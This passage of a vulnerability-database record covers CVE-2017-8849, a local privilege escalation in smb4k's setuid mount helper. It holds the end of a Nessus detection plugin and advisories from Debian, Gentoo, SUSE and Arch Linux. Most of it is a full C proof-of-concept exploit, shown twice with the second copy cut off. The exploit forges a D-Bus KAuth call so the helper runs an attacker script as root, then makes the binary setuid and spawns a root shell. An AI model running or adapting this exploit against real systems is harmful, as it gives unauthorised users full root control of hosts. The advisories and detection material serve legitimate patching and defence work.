script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:smb4k\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:smb4k-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:smb4k-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:smb4k-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.2\", reference:\"smb4k-1.2.1-3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"smb4k-debuginfo-1.2.1-3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"smb4k-debugsource-1.2.1-3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"smb4k-lang-1.2.1-3.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"smb4k / smb4k-debuginfo / smb4k-debugsource / smb4k-lang\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "debian": [{"lastseen": "2019-05-30T02:21:25", "bulletinFamily": "unix", "cvelist": ["CVE-2017-8849"], "description": "Package : smb4k\nVersion : 1.2.1-2~deb7u1\nCVE ID : CVE-2017-8849\nDebian Bug : 862505\n\nSebastian Krahmer from SUSE discovered that smb4k, a Samba (SMB) share\nadvanced browser, contains a logic flaw in which the mount helper binary\ndoes not properly verify the mount command it is being asked to run.\n\nThis allows local users to call any other binary as root.\n\nThe issue is resolved by backporting version 1.2.1-2 from Debian 9\n"Stretch".\n\nFor Debian 7 "Wheezy", these problems have been fixed in version\n1.2.1-2~deb7u1.\n\nWe recommend that you upgrade your smb4k packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "edition": 2, "modified": "2017-06-25T22:41:59", "published": "2017-06-25T22:41:59", "id": "DEBIAN:DLA-1002-1:1EBFE", "href": "https://lists.debian.org/debian-lts-announce/2017/debian-lts-announce-201706/msg00031.html", "title": "[SECURITY] [DLA 1002-1] smb4k security update", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-30T02:22:53", "bulletinFamily": "unix", "cvelist": ["CVE-2017-8849"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3951-1 security@debian.org\nhttps://www.debian.org/security/ Moritz Muehlenhoff\nAugust 22, 2017 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : smb4k\nCVE ID : CVE-2017-8849\n\nSebastian Krahmer discovered that a programming error in the mount\nhelper binary of the Smb4k Samba network share browser may result in\nlocal privilege escalation.\n\nFor the oldstable distribution (jessie), this problem has been fixed\nin version 1.2.1-2~deb8u1.\n\nWe recommend that you upgrade your smb4k packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 2, "modified": "2017-08-22T21:30:16", "published": "2017-08-22T21:30:16", "id": "DEBIAN:DSA-3951-1:6632E", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2017/msg00213.html", "title": "[SECURITY] [DSA 3951-1] smb4k security update", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "gentoo": [{"lastseen": "2017-05-28T22:26:23", "bulletinFamily": "unix", "cvelist": ["CVE-2017-8849"], "description": "### Background\n\nSmb4K is a SMB/CIFS (Windows) share browser for KDE.\n\n### Description\n\nSmb4k contains a logic flaw in which mount helper binary does not properly verify the mount command it is being asked to run. \n\n### Impact\n\nA local user can execute commands with the root privilege due to the mount helper being installed as suid. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Smb4K users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-misc/smb4k-1.2.3-r1:4\"", "edition": 1, "modified": "2017-05-26T00:00:00", "published": "2017-05-26T00:00:00", "href": "https://security.gentoo.org/glsa/201705-14", "id": "GLSA-201705-14", "title": "Smb4K: Arbitrary command execution as root", "type": "gentoo", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "suse": [{"lastseen": "2017-05-18T19:20:41", "bulletinFamily": "unix", "cvelist": ["CVE-2017-8849"], "description": "This update for smb4k fixes the following issues:\n\n - Disabled dbus service and polkit rules, because this version of smb4k\n has a local root exploit issue (boo#1036245, CVE-2017-8849). Automatic\n mounting will no longer be possible to work around this security issue.\n\n", "edition": 1, "modified": "2017-05-18T21:11:51", "published": "2017-05-18T21:11:51", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-05/msg00057.html", "id": "OPENSUSE-SU-2017:1343-1", "title": "Security update for smb4k (important)", "type": "suse", "cvss": {"score": 0.0, "vector": "NONE"}}], "archlinux": [{"lastseen": "2020-09-22T18:36:43", "bulletinFamily": "unix", "cvelist": ["CVE-2017-8849"], "description": "Arch Linux Security Advisory ASA-201705-11\n==========================================\n\nSeverity: High\nDate : 2017-05-10\nCVE-ID : CVE-2017-8849\nPackage : smb4k\nType : privilege escalation\nRemote : No\nLink : https://security.archlinux.org/AVG-268\n\nSummary\n=======\n\nThe package smb4k before version 2.0.0-2 is vulnerable to privilege\nescalation.\n\nResolution\n==========\n\nUpgrade to 2.0.0-2.\n\n# pacman -Syu \"smb4k>=2.0.0-2\"\n\nThe problem has been fixed upstream but no release is available yet.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\nSmb4k <= 2.0.0 contains a logic flaw in which mount helper binary does\nnot properly verify the mount command it is being asked to run. This\nallows calling any other binary as root since the mount helper is\ntypically installed as suid.\n\nImpact\n======\n\nA local, unprivileged attacker can escalate privileges to become root\non the affected host.\n\nReferences\n==========\n\nhttps://www.kde.org/info/security/advisory-20170510-2.txt\nhttp://seclists.org/oss-sec/2017/q2/240\nhttps://commits.kde.org/smb4k/a90289b0962663bc1d247bbbd31b9e65b2ca000e\nhttps://security.archlinux.org/CVE-2017-8849", "modified": "2017-05-10T00:00:00", "published": "2017-05-10T00:00:00", "id": "ASA-201705-11", "href": "https://security.archlinux.org/ASA-201705-11", "type": "archlinux", "title": "[ASA-201705-11] smb4k: privilege escalation", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-04-10T04:22:50", "description": "Exploit for linux platform in category local exploits", "edition": 1, "published": "2017-05-23T00:00:00", "type": "zdt", "title": "KDE 4/5 - KAuth Privilege Escalation Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-8422", "CVE-2017-8849"], "modified": "2017-05-23T00:00:00", "href": "https://0day.today/exploit/description/27821", "id": "1337DAY-ID-27821", "sourceData": "// cc -Wall smb0k.c -pedantic -std=c11\r\n//\r\n// smb4k PoC, also demonstrating broader scope of a generic kde\r\n// authentication bypass vulnerability\r\n//\r\n// (C) 2017 Sebastian Krahmer\r\n//\r\n \r\n#define _POSIX_C_SOURCE 200112L\r\n#include <stdio.h>\r\n#include <fcntl.h>\r\n#include <unistd.h>\r\n#include <stdlib.h>\r\n#include <errno.h>\r\n#include <string.h>\r\n#include <sys/types.h>\r\n#include <sys/wait.h>\r\n#include <sys/stat.h>\r\n \r\n \r\nvoid die(const char *s)\r\n{\r\n perror(s);\r\n exit(errno);\r\n}\r\n \r\n \r\nint main(int argc, char **argv)\r\n{\r\n char me[1024] = {0};\r\n char *dbus[] = {\r\n \"/usr/bin/dbus-send\",\r\n \"--system\",\r\n \"--print-reply\",\r\n \"--dest=net.sourceforge.smb4k.mounthelper\",\r\n \"/\",\r\n \"org.kde.auth.performActions\",\r\n \"array:byte:\"\r\n// The variant map, containing evil mh_command key-pair\r\n\"0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x4e,0x00,0x6e,0x00,0x65,0x00,0x74,\"\r\n\"0x00,0x2e,0x00,0x73,0x00,0x6f,0x00,0x75,0x00,0x72,0x00,0x63,0x00,0x65,\"\r\n\"0x00,0x66,0x00,0x6f,0x00,0x72,0x00,0x67,0x00,0x65,0x00,0x2e,0x00,0x73,\"\r\n\"0x00,0x6d,0x00,0x62,0x00,0x34,0x00,0x6b,0x00,0x2e,0x00,0x6d,0x00,0x6f,\"\r\n\"0x00,0x75,0x00,0x6e,0x00,0x74,0x00,0x68,0x00,0x65,0x00,0x6c,0x00,0x70,\"\r\n\"0x00,0x65,0x00,0x72,0x00,0x2e,0x00,0x6d,0x00,0x6f,0x00,0x75,0x00,0x6e,\"\r\n\"0x00,0x74,0x00,0x00,0x00,0x08,0x00,0x00,0x00,0x18,0x00,0x6d,0x00,0x68,\"\r\n\"0x00,0x5f,0x00,0x77,0x00,0x6f,0x00,0x72,0x00,0x6b,0x00,0x67,0x00,0x72,\"\r\n\"0x00,0x6f,0x00,0x75,0x00,0x70,0x00,0x00,0x00,0x0a,0x00,0x00,0x00,0x00,\"\r\n\"0x00,0x00,0x00,0x00,0x0c,0x00,0x6d,0x00,0x68,0x00,0x5f,0x00,0x75,0x00,\"\r\n\"0x72,0x00,0x6c,0x00,0x00,0x00,0x11,0x00,0x00,0x00,0x00,0x24,0x73,0x6d,\"\r\n\"0x62,0x3a,0x2f,0x2f,0x61,0x62,0x63,0x3a,0x31,0x32,0x33,0x34,0x35,0x36,\"\r\n\"0x40,0x31,0x32,0x37,0x2e,0x30,0x2e,0x30,0x2e,0x31,0x3a,0x34,0x34,0x35,\"\r\n\"0x2f,0x73,0x68,0x61,0x72,0x65,0x00,0x00,0x00,0x0c,0x00,0x6d,0x00,0x68,\"\r\n\"0x00,0x5f,0x00,0x75,0x00,0x6e,0x00,0x63,0x00,0x00,0x00,0x0a,0x00,0x00,\"\r\n\"0x00,0x00,0x22,0x00,0x2f,0x00,0x2f,0x00,0x31,0x00,0x32,0x00,0x37,0x00,\"\r\n\"0x2e,0x00,0x30,0x00,0x2e,0x00,0x30,0x00,0x2e,0x00,0x31,0x00,0x2f,0x00,\"\r\n\"0x73,0x00,0x68,0x00,0x61,0x00,0x72,0x00,0x65,0x00,0x00,0x00,0x14,0x00,\"\r\n\"0x6d,0x00,0x68,0x00,0x5f,0x00,0x6f,0x00,0x70,0x00,0x74,0x00,0x69,0x00,\"\r\n\"0x6f,0x00,0x6e,0x00,0x73,0x00,0x00,0x00,0x0b,0x00,0x00,0x00,0x00,0x02,\"\r\n\"0x00,0x00,0x00,0x04,0x00,0x2d,0x00,0x6f,0x00,0x00,0x01,0x1c,0x00,0x75,\"\r\n\"0x00,0x73,0x00,0x65,0x00,0x72,0x00,0x6e,0x00,0x61,0x00,0x6d,0x00,0x65,\"\r\n\"0x00,0x3d,0x00,0x6a,0x00,0x6f,0x00,0x65,0x00,0x2c,0x00,0x75,0x00,0x69,\"\r\n\"0x00,0x64,0x00,0x3d,0x00,0x33,0x00,0x33,0x00,0x33,0x00,0x33,0x00,0x2c,\"\r\n\"0x00,0x67,0x00,0x69,0x00,0x64,0x00,0x3d,0x00,0x31,0x00,0x30,0x00,0x30,\"\r\n\"0x00,0x2c,0x00,0x70,0x00,0x6f,0x00,0x72,0x00,0x74,0x00,0x3d,0x00,0x34,\"\r\n\"0x00,0x34,0x00,0x35,0x00,0x2c,0x00,0x72,0x00,0x77,0x00,0x2c,0x00,0x66,\"\r\n\"0x00,0x69,0x00,0x6c,0x00,0x65,0x00,0x5f,0x00,0x6d,0x00,0x6f,0x00,0x64,\"\r\n\"0x00,0x65,0x00,0x3d,0x00,0x30,0x00,0x37,0x00,0x35,0x00,0x35,0x00,0x2c,\"\r\n\"0x00,0x64,0x00,0x69,0x00,0x72,0x00,0x5f,0x00,0x6d,0x00,0x6f,0x00,0x64,\"\r\n\"0x00,0x65,0x00,0x3d,0x00,0x30,0x00,0x37,0x00,0x35,0x00,0x35,0x00,0x2c,\"\r\n\"0x00,0x70,0x00,0x65,0x00,0x72,0x00,0x6d,0x00,0x2c,0x00,0x6e,0x00,0x6f,\"\r\n\"0x00,0x73,0x00,0x65,0x00,0x74,0x00,0x75,0x00,0x69,0x00,0x64,0x00,0x73,\"\r\n\"0x00,0x2c,0x00,0x6e,0x00,0x6f,0x00,0x73,0x00,0x65,0x00,0x72,0x00,0x76,\"\r\n\"0x00,0x65,0x00,0x72,0x00,0x69,0x00,0x6e,0x00,0x6f,0x00,0x2c,0x00,0x63,\"\r\n\"0x00,0x61,0x00,0x63,0x00,0x68,0x00,0x65,0x00,0x3d,0x00,0x73,0x00,0x74,\"\r\n\"0x00,0x72,0x00,0x69,0x00,0x63,0x00,0x74,0x00,0x2c,0x00,0x6e,0x00,0x6f,\"\r\n\"0x00,0x6d,0x00,0x61,0x00,0x70,0x00,0x63,0x00,0x68,0x00,0x61,0x00,0x72,\"\r\n\"0x00,0x73,0x00,0x2c,0x00,0x73,0x00,0x65,0x00,0x63,0x00,0x3d,0x00,0x6e,\"\r\n\"0x00,0x74,0x00,0x6c,0x00,0x6d,0x00,0x73,0x00,0x73,0x00,0x70,0x00,0x2c,\"\r\n\"0x00,0x76,0x00,0x65,0x00,0x72,0x00,0x73,0x00,0x3d,0x00,0x31,0x00,0x2e,\"\r\n\"0x00,0x30,0x00,0x00,0x00,0x1a,0x00,0x6d,0x00,0x68,0x00,0x5f,0x00,0x6d,\"\r\n\"0x00,0x6f,0x00,0x75,0x00,0x6e,0x00,0x74,0x00,0x70,0x00,0x6f,0x00,0x69,\"\r\n\"0x00,0x6e,0x00,0x74,0x00,0x00,0x00,0x0a,0x00,0x00,0x00,0x00,0x3e,0x00,\"\r\n\"0x2f,0x00,0x68,0x00,0x6f,0x00,0x6d,0x00,0x65,0x00,0x2f,0x00,0x6a,0x00,\"\r\n\"0x6f,0x00,0x65,0x00,0x2f,0x00,0x73,0x00,0x6d,0x00,0x62,0x00,0x34,0x00,\"\r\n\"0x6b,0x00,0x2f,0x00,0x31,0x00,0x32,0x00,0x37,0x00,0x2e,0x00,0x30,0x00,\"\r\n\"0x2e,0x00,0x30,0x00,0x2e,0x00,0x31,0x00,0x2f,0x00,0x73,0x00,0x68,0x00,\"\r\n\"0x61,0x00,0x72,0x00,0x65,0x00,0x00,0x00,0x0a,0x00,0x6d,0x00,0x68,0x00,\"\r\n\"0x5f,0x00,0x69,0x00,0x70,0x00,0x00,0x00,0x0a,0x00,0xff,0xff,0xff,0xff,\"\r\n\"0x00,0x00,0x00,0x14,0x00,0x6d,0x00,0x68,0x00,0x5f,0x00,0x63,0x00,0x6f,\"\r\n\"0x00,0x6d,0x00,0x6d,0x00,0x65,0x00,0x6e,0x00,0x74,0x00,0x00,0x00,0x0a,\"\r\n\"0x00,0xff,0xff,0xff,0xff,0x00,0x00,0x00,0x14,0x00,0x6d,0x00,0x68,0x00,\"\r\n\"0x5f,0x00,0x63,0x00,0x6f,0x00,0x6d,0x00,0x6d,0x00,0x61,0x00,0x6e,0x00,\"\r\n\"0x64,0x00,0x00,0x00,0x0a,0x00,0x00,0x00,0x00,0x20,0x00,0x2f,0x00,0x74,\"\r\n\"0x00,0x6d,0x00,0x70,0x00,0x2f,0x00,0x78,0x00,0x6d,0x00,0x6f,0x00,0x75,\"\r\n\"0x00,0x6e,0x00,0x74,0x00,0x2e,0x00,0x63,0x00,0x69,0x00,0x66,0x00,0x73\",\r\n \r\n// the callerID, \":1.0\" which is dbus itself and thus always passes\r\n\"array:byte:58,49,46,48\", NULL};\r\n \r\n char *boomsh = \"/tmp/xmount.cifs\";\r\n char *const sh[] = {me, \"shell\", NULL};\r\n char *const bash[] = {\"/bin/bash\", \"--norc\", \"--noprofile\", NULL};\r\n struct stat st;\r\n int fd = -1;\r\n \r\n if (readlink(\"/proc/self/exe\", me, sizeof(me) - 1) < 0)\r\n die(\"[-] readlink\");\r\n \r\n if (geteuid() == 0) {\r\n setuid(0);\r\n setgid(0);\r\n if (argc == 2) {\r\n execve(*bash, bash, NULL);\r\n die(\"[-] execve of bash\");\r\n }\r\n chown(me, 0, 0);\r\n chmod(me, 04755);\r\n exit(0);\r\n }\r\n \r\n printf(\"[*] Creating shellscript ...\\n\");\r\n unlink(boomsh);\r\n if ((fd = open(boomsh, O_RDWR|O_CREAT, 0755)) < 0)\r\n die(\"[-] open\");\r\n write(fd, \"#!/bin/sh\\n\", 10);\r\n write(fd, me, strlen(me));\r\n write(fd, \"\\n\", 1);\r\n close(fd);\r\n \r\n printf(\"[*] Triggering call...\\n\");\r\n \r\n if (fork() == 0) {\r\n execve(*dbus, dbus, NULL);\r\n exit(1);\r\n }\r\n wait(NULL);\r\n sleep(5);\r\n printf(\"[*] Trying to find rootshell...\\n\");\r\n \r\n memset(&st, 0, sizeof(st));\r\n stat(me, &st);\r\n if ((st.st_mode & 04000) != 04000)\r\n die(\"[-] Failed to chmod ourselfs.\\n\");\r\n \r\n execve(me, sh, NULL);\r\n return 0;\r\n}\n\n# 0day.today [2018-04-10] #", "sourceHref": "https://0day.today/exploit/27821", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2017-05-25T20:39:42", "description": "KDE 4/5 - 'KAuth' Privilege Escalation. CVE-2017-8422,CVE-2017-8849. Local exploit for Linux platform", "published": "2017-05-18T00:00:00", "type": "exploitdb", "title": "KDE 4/5 - 'KAuth' Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-8422", "CVE-2017-8849"], "modified": "2017-05-18T00:00:00", "id": "EDB-ID:42053", "href": "https://www.exploit-db.com/exploits/42053/", "sourceData": "// cc -Wall smb0k.c -pedantic -std=c11\r\n//\r\n// smb4k PoC, also demonstrating broader scope of a generic kde\r\n// authentication bypass vulnerability\r\n//\r\n// (C) 2017 Sebastian Krahmer\r\n//\r\n\r\n#define _POSIX_C_SOURCE 200112L\r\n#include <stdio.h>\r\n#include <fcntl.h>\r\n#include <unistd.h>\r\n#include <stdlib.h>\r\n#include <errno.h>\r\n#include <string.h>\r\n#include <sys/types.h>\r\n#include <sys/wait.h>\r\n#include <sys/stat.h>\r\n\r\n\r\nvoid die(const char *s)\r\n{\r\n\tperror(s);\r\n\texit(errno);\r\n}\r\n\r\n\r\nint main(int argc, char **argv)\r\n{\r\n\tchar me[1024] = {0};\r\n\tchar *dbus[] = {\r\n\t\t\"/usr/bin/dbus-send\",\r\n\t\t\"--system\",\r\n\t\t\"--print-reply\",\r\n\t\t\"--dest=net.sourceforge.smb4k.mounthelper\",\r\n\t\t\"/\",\r\n\t\t\"org.kde.auth.performActions\",\r\n\t\t\"array:byte:\"\r\n// The variant map, containing evil mh_command key-pair\r\n\"0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x4e,0x00,0x6e,0x00,0x65,0x00,0x74,\"\r\n\"0x00,0x2e,0x00,0x73,0x00,0x6f,0x00,0x75,0x00,0x72,0x00,0x63,0x00,0x65,\"\r\n\"0x00,0x66,0x00,0x6f,0x00,0x72,0x00,0x67,0x00,0x65,0x00,0x2e,0x00,0x73,\"\r\n\"0x00,0x6d,0x00,0x62,0x00,0x34,0x00,0x6b,0x00,0x2e,0x00,0x6d,0x00,0x6f,\"\r\n\"0x00,0x75,0x00,0x6e,0x00,0x74,0x00,0x68,0x00,0x65,0x00,0x6c,0x00,0x70,\"\r\n\"0x00,0x65,0x00,0x72,0x00,0x2e,0x00,0x6d,0x00,0x6f,0x00,0x75,0x00,0x6e,\"\r\n\"0x00,0x74,0x00,0x00,0x00,0x08,0x00,0x00,0x00,0x18,0x00,0x6d,0x00,0x68,\"\r\n\"0x00,0x5f,0x00,0x77,0x00,0x6f,0x00,0x72,0x00,0x6b,0x00,0x67,0x00,0x72,\"\r\n\"0x00,0x6f,0x00,0x75,0x00,0x70,0x00,0x00,0x00,0x0a,0x00,0x00,0x00,0x00,\"\r\n\"0x00,0x00,0x00,0x00,0x0c,0x00,0x6d,0x00,0x68,0x00,0x5f,0x00,0x75,0x00,\"\r\n\"0x72,0x00,0x6c,0x00,0x00,0x00,0x11,0x00,0x00,0x00,0x00,0x24,0x73,0x6d,\"\r\n\"0x62,0x3a,0x2f,0x2f,0x61,0x62,0x63,0x3a,0x31,0x32,0x33,0x34,0x35,0x36,\"\r\n\"0x40,0x31,0x32,0x37,0x2e,0x30,0x2e,0x30,0x2e,0x31,0x3a,0x34,0x34,0x35,\"\r\n\"0x2f,0x73,0x68,0x61,0x72,0x65,0x00,0x00,0x00,0x0c,0x00,0x6d,0x00,0x68,\"\r\n\"0x00,0x5f,0x00,0x75,0x00,0x6e,0x00,0x63,0x00,0x00,0x00,0x0a,0x00,0x00,\"\r\n\"0x00,0x00,0x22,0x00,0x2f,0x00,0x2f,0x00,0x31,0x00,0x32,0x00,0x37,0x00,\"\r\n\"0x2e,0x00,0x30,0x00,0x2e,0x00,0x30,0x00,0x2e,0x00,0x31,0x00,0x2f,0x00,\"\r\n\"0x73,0x00,0x68,0x00,0x61,0x00,0x72,0x00,0x65,0x00,0x00,0x00,0x14,0x00,\"\r\n\"0x6d,0x00,0x68,0x00,0x5f,0x00,0x6f,0x00,0x70,0x00,0x74,0x00,0x69,0x00,\"\r\n\"0x6f,0x00,0x6e,0x00,0x73,0x00,0x00,0x00,0x0b,0x00,0x00,0x00,0x00,0x02,\"\r\n\"0x00,0x00,0x00,0x04,0x00,0x2d,0x00,0x6f,0x00,0x00,0x01,0x1c,0x00,0x75,\"\r\n\"0x00,0x73,0x00,0x65,0x00,0x72,0x00,0x6e,0x00,0x61,0x00,0x6d,0x00,0x65,\"\r\n\"0x00,0x3d,0x00,0x6a,0x00,0x6f,0x00,0x65,0x00,0x2c,0x00,0x75,0x00,0x69,\"\r\n\"0x00,0x64,0x00,0x3d,0x00,0x33,0x00,0x33,0x00,0x33,0x00,0x33,0x00,0x2c,\"\r\n\"0x00,0x67,0x00,0x69,0x00,0x64,0x00,0x3d,0x00,0x31,0x00,0x30,0x00,0x30,\"\r\n\"0x00,0x2c,0x00,0x70,0x00,0x6f,0x00,0x72,0x00,0x74,0x00,0x3d,0x00,0x34,\"\r\n\"0x00,0x34,0x00,0x35,0x00,0x2c,0x00,0x72,0x00,0x77,0x00,0x2c,0x00,0x66,\"\r\n\"0x00,0x69,0x00,0x6c,0x00,0x65,0x00,0x5f,0x00,0x6d,0x00,0x6f,0x00,0x64,\"\r\n\"0x00,0x65,0x00,0x3d,0x00,0x30,0x00,0x37,0x00,0x35,0x00,0x35,0x00,0x2c,\"\r\n\"0x00,0x64,0x00,0x69,0x00,0x72,0x00,0x5f,0x00,0x6d,0x00,0x6f,0x00,0x64,\"\r\n\"0x00,0x65,0x00,0x3d,0x00,0x30,0x00,0x37,0x00,0x35,0x00,0x35,0x00,0x2c,\"\r\n\"0x00,0x70,0x00,0x65,0x00,0x72,0x00,0x6d,0x00,0x2c,0x00,0x6e,0x00,0x6f,\"\r\n\"0x00,0x73,0x00,0x65,0x00,0x74,0x00,0x75,0x00,0x69,0x00,0x64,0x00,0x73,\"\r\n\"0x00,0x2c,0x00,0x6e,0x00,0x6f,0x00,0x73,0x00,0x65,0x00,0x72,0x00,0x76,\"\r\n\"0x00,0x65,0x00,0x72,0x00,0x69,0x00,0x6e,0x00,0x6f,0x00,0x2c,0x00,0x63,\"\r\n\"0x00,0x61,0x00,0x63,0x00,0x68,0x00,0x65,0x00,0x3d,0x00,0x73,0x00,0x74,\"\r\n\"0x00,0x72,0x00,0x69,0x00,0x63,0x00,0x74,0x00,0x2c,0x00,0x6e,0x00,0x6f,\"\r\n\"0x00,0x6d,0x00,0x61,0x00,0x70,0x00,0x63,0x00,0x68,0x00,0x61,0x00,0x72,\"\r\n\"0x00,0x73,0x00,0x2c,0x00,0x73,0x00,0x65,0x00,0x63,0x00,0x3d,0x00,0x6e,\"\r\n\"0x00,0x74,0x00,0x6c,0x00,0x6d,0x00,0x73,0x00,0x73,0x00,0x70,0x00,0x2c,\"\r\n\"0x00,0x76,0x00,0x65,0x00,0x72,0x00,0x73,0x00,0x3d,0x00,0x31,0x00,0x2e,\"\r\n\"0x00,0x30,0x00,0x00,0x00,0x1a,0x00,0x6d,0x00,0x68,0x00,0x5f,0x00,0x6d,\"\r\n\"0x00,0x6f,0x00,0x75,0x00,0x6e,0x00,0x74,0x00,0x70,0x00,0x6f,0x00,0x69,\"\r\n\"0x00,0x6e,0x00,0x74,0x00,0x00,0x00,0x0a,0x00,0x00,0x00,0x00,0x3e,0x00,\"\r\n\"0x2f,0x00,0x68,0x00,0x6f,0x00,0x6d,0x00,0x65,0x00,0x2f,0x00,0x6a,0x00,\"\r\n\"0x6f,0x00,0x65,0x00,0x2f,0x00,0x73,0x00,0x6d,0x00,0x62,0x00,0x34,0x00,\"\r\n\"0x6b,0x00,0x2f,0x00,0x31,0x00,0x32,0x00,0x37,0x00,0x2e,0x00,0x30,0x00,\"\r\n\"0x2e,0x00,0x30,0x00,0x2e,0x00,0x31,0x00,0x2f,0x00,0x73,0x00,0x68,0x00,\"\r\n\"0x61,0x00,0x72,0x00,0x65,0x00,0x00,0x00,0x0a,0x00,0x6d,0x00,0x68,0x00,\"\r\n\"0x5f,0x00,0x69,0x00,0x70,0x00,0x00,0x00,0x0a,0x00,0xff,0xff,0xff,0xff,\"\r\n\"0x00,0x00,0x00,0x14,0x00,0x6d,0x00,0x68,0x00,0x5f,0x00,0x63,0x00,0x6f,\"\r\n\"0x00,0x6d,0x00,0x6d,0x00,0x65,0x00,0x6e,0x00,0x74,0x00,0x00,0x00,0x0a,\"\r\n\"0x00,0xff,0xff,0xff,0xff,0x00,0x00,0x00,0x14,0x00,0x6d,0x00,0x68,0x00,\"\r\n\"0x5f,0x00,0x63,0x00,0x6f,0x00,0x6d,0x00,0x6d,0x00,0x61,0x00,0x6e,0x00,\"\r\n\"0x64,0x00,0x00,0x00,0x0a,0x00,0x00,0x00,0x00,0x20,0x00,0x2f,0x00,0x74,\"\r\n\"0x00,0x6d,0x00,0x70,0x00,0x2f,0x00,0x78,0x00,0x6d,0x00,0x6f,0x00,0x75,\"\r\n\"0x00,0x6e,0x00,0x74,0x00,0x2e,0x00,0x63,0x00,0x69,0x00,0x66,0x00,0x73\",\r\n\r\n// the callerID, \":1.0\" which is dbus itself and thus always passes\r\n\"array:byte:58,49,46,48\", NULL};\r\n\r\n\tchar *boomsh = \"/tmp/xmount.cifs\";\r\n\tchar *const sh[] = {me, \"shell\", NULL};\r\n\tchar *const bash[] = {\"/bin/bash\", \"--norc\", \"--noprofile\", NULL};\r\n\tstruct stat st;\r\n\tint fd = -1;\r\n\r\n\tif (readlink(\"/proc/self/exe\", me, sizeof(me) - 1) < 0)\r\n\t\tdie(\"[-] readlink\");\r\n\r\n\tif (geteuid() == 0) {\r\n\t\tsetuid(0);\r\n\t\tsetgid(0);\r\n\t\tif (argc == 2) {\r\n\t\t\texecve(*bash, bash, NULL);\r\n\t\t\tdie(\"[-] execve of bash\");\r\n\t\t}\r\n\t\tchown(me, 0, 0);\r\n\t\tchmod(me, 04755);\r\n\t\texit(0);\r\n\t}\r\n\r\n\tprintf(\"[*] Creating shellscript 